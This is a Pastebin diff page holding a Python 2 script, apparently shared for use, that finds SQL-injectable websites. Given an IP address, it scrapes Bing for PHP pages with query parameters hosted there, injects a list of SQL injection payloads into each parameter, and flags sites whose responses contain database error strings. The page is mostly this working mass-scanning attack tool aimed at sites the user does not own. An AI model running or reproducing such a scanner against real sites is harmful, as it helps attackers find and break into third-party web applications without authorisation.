API tools faq
paste
View difference between Paste ID: KHJYWihM and XUjHVGak
SHOW: | | - or go back to the newest paste.
1
#!/usr/bin/env python
2
3
# server websites sqli injection checker

4
# v1.2 detecting parameters 

5
# Got Some codes and ideas from WebPwn3r Project (a good one)

6
7
import urllib2 , os , sys , re

8
from platform import system

9
10
class colors():

11
    PURPLE = '\033[95m'

12
    CYAN = '\033[96m'

13
    DARKCYAN = '\033[36m'

14
    BLUE = '\033[94m'

15
    GREEN = '\033[92m'

16
    YELLOW = '\033[93m'

17
    RED = '\033[91m'

18
    ENDC = '\033[0m'

19
20
if system() == 'Linux':

21
    os.system('clear')

22
if system() == 'Windows':

23
    os.system('cls')

24
25
logo = '''

26
   _____ ____    __    _

27
  / ___// __ \  / /   (_) | ----| SQLi Checker |----

28
  \__ \/ / / / / /   / /  | Autohr : MatriX Coder

29
 ___/ / /_/ / / /___/ /   | FB : www.fb.com/matrixcoder2

30
/____/\___\_\/_____/_/    | Blog : www.matrixcoder.co.vu

31
32
33
'''

34
35
print(colors.BLUE + logo + colors.ENDC)

36
37
try:

38
    lista = []

39
    payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]

40
    check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)

41
    s = sys.argv[1]

42
    page = 1

43
    print('\n')

44
    while page <= 101:

45
        bing = "http://www.bing.com/search?q=ip%3A"+s+"+php?id=&count=50&first="+str(page)

46
        openbing  = urllib2.urlopen(bing)

47
        readbing = openbing.read()

48
        findwebs = re.findall('<h2><a href="(.*?)"' , readbing)

49
        for i in range(len(findwebs)):

50
            x = findwebs[i]

51
            lista.append(x)

52
53
        page = page + 50

54
        for site in lista:

55
            vulnz = []

56
            try:

57
                for param in site.split('?')[1].split('&'):

58
                    for payload in payloads:

59
                        pows = site.replace(param , param + payload.strip())

60
                        print pows

61
                        html = urllib2.urlopen(pows).readlines()

62
                        for line in html:

63
                            checker = re.findall(check , line)

64
                            if len(checker) != 0 and site not in vulnz:

65
                                vulnz.append(site)

66
                                print colors.GREEN + '\nSQLi Found ==> %s\n' % site + colors.ENDC

67
            except:

68
                pass

69
        

70
except IndexError:

71
    print "[*] Usage : python "+sys.argv[0]+" 127.0.0.1"
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!